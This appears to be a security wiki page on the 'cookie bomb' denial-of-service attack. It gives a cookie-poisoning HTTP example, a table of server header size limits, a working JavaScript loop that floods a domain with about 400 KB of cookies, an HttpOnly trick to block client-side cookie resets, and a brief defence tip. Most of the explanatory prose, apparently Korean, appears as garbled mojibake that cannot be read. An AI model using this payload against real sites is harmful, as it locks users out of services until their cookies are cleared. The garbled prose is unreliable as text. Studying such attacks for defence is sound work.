Cookie Bomb Attack

๐Ÿ” Introduction

Cookie bomb์€ ๋น„์ •์ƒ์ ์œผ๋กœ ํฐ ์ฟ ํ‚ค ๊ฐ’์„ ์ด์šฉํ•ด์„œ DOS๋ฅผ ์œ ๋„ํ•˜๋Š” ๊ณต๊ฒฉ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค. ๊ธฐ๋ณธ์ ์œผ๋กœ ๊ฐ€์šฉ์„ฑ์„ ์นจํ•ดํ•˜๋Š” DOS ๊ณต๊ฒฉ์ด ์ฃผ๋ฅผ ์ด๋ฃจ๋ฉฐ, ์ด์™ธ์—๋„ ๋‹ค๋ฅธ ์ทจ์•ฝ์ ๊ณผ Chain attack ํ˜•ํƒœ๋กœ ์‚ฌ์šฉ๋  ๊ฐ€๋Šฅ์„ฑ์ด ์กด์žฌํ•ฉ๋‹ˆ๋‹ค.

์ผ๋ฐ˜์ ์œผ๋กœ HTTP Request์˜ ํ—ค๋”๊ฐ’์ด ํฐ ๊ฒฝ์šฐ ์„œ๋น„์Šค์—์„œ 413 Request Entity Too Large ๋˜๋Š” 400 Bad Request ๋“ฑ์˜ ์—๋Ÿฌ๋ฅผ ๋ฐ˜ํ™˜ํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•  ์ˆ˜ ์žˆ๋Š” ํ—ค๋”์—๋Š” ๋Œ€ํ‘œ์ ์œผ๋กœ Cookie ํ—ค๋”๊ฐ€ ์žˆ์œผ๋ฉฐ, File cookie์— ๋Œ€๋Ÿ‰์˜ ๋ฐ์ดํ„ฐ๊ฐ€ ์‚ฝ์ž…๋œ ๊ฒฝ์šฐ ํ•ด๋‹น ์ฟ ํ‚ค๋ฅผ ์ดˆ๊ธฐํ™” ํ•˜์ง€ ์•Š๋Š” ์ด์ƒ ๋ชจ๋“  ์š”์ฒญ์—์„œ 413, 400 ์—๋Ÿฌ๋“ฑ์ด ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

🗡 Offensive techniques

Detect

์„œ๋น„์Šค์—์„œ ์ฟ ํ‚ค๋ฅผ ์„ค์ •ํ•  ์ˆ˜ ์žˆ๋Š” ํฌ์ธํŠธ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. ๊ฐ€์žฅ ๊ฐ„๋‹จํ•˜๊ฒŒ๋Š” XSS ๊ทธ๋ฆฌ๊ณ  Cookie poisoning์ด ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋ ‡๊ฒŒ ์ž„์˜ ์ฟ ํ‚ค๋ฅผ ์‚ฌ์šฉ์ž์—๊ฒŒ ์„ธํŒ…ํ•  ์ˆ˜ ์žˆ๋Š” ๋ถ€๋ถ„์ด ์žˆ๋‹ค๋ฉด Cookie bomb attack์„ ์„ฑ๊ณตํ•  ๊ฐ€๋Šฅ์„ฑ์ด ์กด์žฌํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

e.g. (cookie poisoning)

GET /info?locale=KR999 HTTP/1.1

HTTP/1.1 200 OK
Set-Cookie: localeCookie=KR999;

Exploitation

์›น ์„œ๋ฒ„๋“ค์€ ์•„๋ž˜์™€ ๊ฐ™์€ ์‚ฌ์ด์ฆˆ์˜ ํ—ค๋” ์š”์ฒญ์ด ์žˆ๋Š” ๊ฒฝ์šฐ ์—๋Ÿฌ๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.

Server Size
Nginx 4KB - 8KB
Apache 8KB
Tomcat 8KB - 48KB
IIS 8KB - 16KB

ํ•ด๋‹น ๋ฐ์ดํ„ฐ ๋ณด๋‹ค ํฐ ์ฟ ํ‚ค๊ฐ’์„ ์„ธํŒ…ํ•˜๋ฉด ํ•ด๋‹น ํŒŒ์ผ ์ฟ ํ‚ค๋ฅผ ์‚ญ์ œํ•˜์ง€ ์•Š๋Š” ์ด์ƒ ๋งค๋ฒˆ ์ ‘๊ทผ ์‹œ ์—๋Ÿฌ ๋ฉ”์‹œ์ง€๊ฐ€ ๋ฐœ์ƒํ•˜์—ฌ ์ •์ƒ์ ์œผ๋กœ ์„œ๋น„์Šค๋ฅผ ์ด์šฉํ•  ์ˆ˜ ์—†๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

Set-Cookie

HTTP/1.1 200 OK
Set-Cookie: localeCookie=aaaaaaaaa------big-size---------bbvbbbb;

With Javascript

var base_domain = "example.com";
// ~4 KB of filler per cookie (Array(4000).join('a') yields 3999 characters)
var pollution = Array(4000).join('a');
// 100 cookies of ~4 KB each: the Cookie header on every request to
// base_domain now exceeds the web server's header size limit
for (var i = 0; i < 100; i++) {
  document.cookie = 'bomb' + i + '=' + pollution + ';domain=' + base_domain;
}

Bypass protection

ํ•ด๋‹น ๊ณต๊ฒฉ์˜ ๋Œ€์‘๋ฐฉ์•ˆ์ธ ์ฟ ํ‚ค์ •๋ณด ์ดˆ๊ธฐํ™”๋ฅผ Javascript ๋‹จ์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒฝ์šฐ ์•„๋ž˜์™€ ๊ฐ™์ด JS์—์„œ ์ปจํŠธ๋กค ํ•  ์ˆ˜ ์—†๋„๋ก HttpOnly ์†์„ฑ์„ ์ฃผ์–ด ๋ณดํ˜ธ ๋กœ์ง์„ ์šฐํšŒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

HTTP/1.1 200 OK
Set-Cookie: localeCookie=aaaaaaaaa------big-size---------bbvbbbb; HttpOnly;

🛡 Defensive techniques

๋น„ ์ •์ƒ์ ์ธ ์ฟ ํ‚ค ์š”์ฒญ์ด ์žˆ๋Š” ๊ฒฝ์šฐ ๋ฌด์กฐ๊ฑด ์—๋Ÿฌ๋กœ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒƒ์ด ์•„๋‹Œ ์ปค์Šคํ…€ ์—๋Ÿฌ ํŽ˜์ด์ง€์—์„œ Set-Cookie๋กœ ํ•ด๋‹น ์ฟ ํ‚ค์˜ expire ๋“ฑ์„ ์กฐ์ •ํ•˜์—ฌ ์ฟ ํ‚ค๋ฅผ ์ดˆ๊ธฐํ™”ํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€์žฅ ์ข‹์Šต๋‹ˆ๋‹ค.
